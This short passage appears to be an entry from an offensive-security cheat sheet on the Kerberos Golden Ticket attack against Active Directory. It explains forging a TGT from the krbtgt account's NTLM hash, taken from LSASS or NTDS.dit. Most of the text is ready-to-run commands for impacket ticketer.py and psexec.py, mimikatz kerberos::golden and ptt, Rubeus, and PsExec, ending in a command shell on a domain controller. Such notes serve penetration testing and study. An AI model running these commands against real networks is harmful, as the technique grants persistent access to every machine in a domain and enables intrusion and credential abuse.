7. Golden ticket
- similar to Silver Ticket
- craft TGT using NTLM hash of the krbtgt AD account
- allows access to any machine in the domain
- hash obtained from the LSASS process or the NTDS.dit file of any DC in the domain
Tools: impacket’s ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows)
Linux
ticketer.py -domain-sid SID -domain DOMAIN -nthash HASH USERNAME
export KRB5CCNAME=USERNAME.ccache
psexec.py DOMAIN\USERNAME@$IP -k -no-pass
Windows
.\mimikatz.exe
kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME
kerberos::ptt TICKET.kirbi
or use Rubeus to do the same
.\Rubeus.exe ptt /ticket:TICKET.kirbi
.\PsExec.exe -accepteula \\DCDOMAINNAME cmd